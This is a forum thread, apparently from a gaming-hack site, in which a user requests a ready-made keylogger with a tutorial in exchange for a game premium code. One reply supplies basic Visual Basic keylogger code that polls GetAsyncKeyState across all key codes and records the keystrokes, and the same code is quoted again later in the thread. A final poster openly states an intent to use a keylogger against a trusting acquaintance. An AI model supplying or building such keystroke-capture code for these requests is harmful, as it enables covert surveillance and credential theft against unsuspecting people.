[Request] Keylogger + Tutorial

Posts 1–15 of 15 · Page 1 of 1
[Request] Keylogger + Tutorial
Hello.
I need a Keylogger with little tutorial how to use that.
If someone help me i give you "Rep" and Promo Code for "Warrock 7 Days Premium" !

Thanks and Greetings ;*
I tryied to find something on forum but i can't find any working Keylogger
First off why do you want a keylogger? And if im satisfied its not for anything illegal. I will supply you with what you need?
this is how to make a basic keylogger

add a text box and a timer (Enabled) to your form.. and put this in ur code

Code:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Timer1_Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
Quote Originally Posted by 2vivi View Post
this is how to make a basic keylogger

add a text box and a timer (Enabled) to your form.. and put this in ur code

Code:
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Timer1_Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
That´s the simplest way !
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
Quote Originally Posted by TaRwA View Post
I'm totally choob on programming so... I need a ready for use Keylogger...
Or ready code to paste in Compiler ; D

Greetings ;*
Youtube is your freind!
no double posting..
Ok tarwa i have one that you can use. I just need to be sure your not using it for something of questionable legality.
It's not problem. I starting programming in C++ and i want to try start programming Keyloggers.
When i have keylogger can i look at his codes and other stuff.
Thank You for your answer ;*

Greetings ;*
Quote Originally Posted by TaRwA View Post
It's not problem. I starting programming in C++ and i want to try start programming Keyloggers.
When i have keylogger can i look at his codes and other stuff.
It's Visual Basic here.
Yeah , but i learn Visual Basics and C++ and i want to try what language is easier for beginners...
So i need Keylogger maked in VB and in C++ for tests .
I want to keylogg my PC to test hich Keylogg is better and other...

[Sorry for my Poor English cuz i'm from Poland]

;*
I want to know how to make one too... I want to own some annoying showoff kid that trusts me. *evil*
Posts 1–15 of 15 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Talk with us